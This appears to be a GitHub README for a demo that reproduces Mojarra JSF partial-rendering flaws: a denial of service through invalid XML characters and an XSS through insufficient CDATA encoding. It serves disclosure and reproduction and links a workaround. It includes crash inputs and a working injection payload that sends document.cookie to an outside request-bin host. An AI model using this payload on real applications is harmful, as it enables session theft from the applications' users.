/mojarra-ajax

Minimal demo to reproduce some issues with mojarra partial update

Primary LanguageJavaMIT LicenseMIT

mojarra-ajax

Minimal demo to reproduce some issues with mojarra partial update.

To reproduce just run

mvn package wildfly:run

and wait for the server to start up.

Issue: Ajax update fails due to invalid characters in response XML (DoS)

Open the url http://localhost:8080/ajax/index.xhtml.

It also works for user supplied inputs, open http://localhost:8080/ajax/input.xhtml and enter the \u000C character into the input field.

Workaround is available at https://github.com/cnsgithub/mojarra-ajax/blob/master/src/main/java/main/IllegalXmlCharactersFilter.java.

Pull request eclipse-ee4j/mojarra#4517 has been closed unmerged.

Issue: Partial rendering: insufficient CDATA encoding (XSS)

Open the url http://localhost:8080/ajax/issue4392.xhtml, enter ]]> and click at the button to see the XML parser crashing (denial of service).

However, this vulnerability might also be used to inject arbitrary javascript (XSS). Just enter ]]></update><eval><![CDATA[window.open("https://postb.in/Lsmfz95D?cookie="+encodeURIComponent(document.cookie));]]></eval><update><![CDATA[ and see how your cookies have been sent to https://postb.in/b/Lsmfz95D.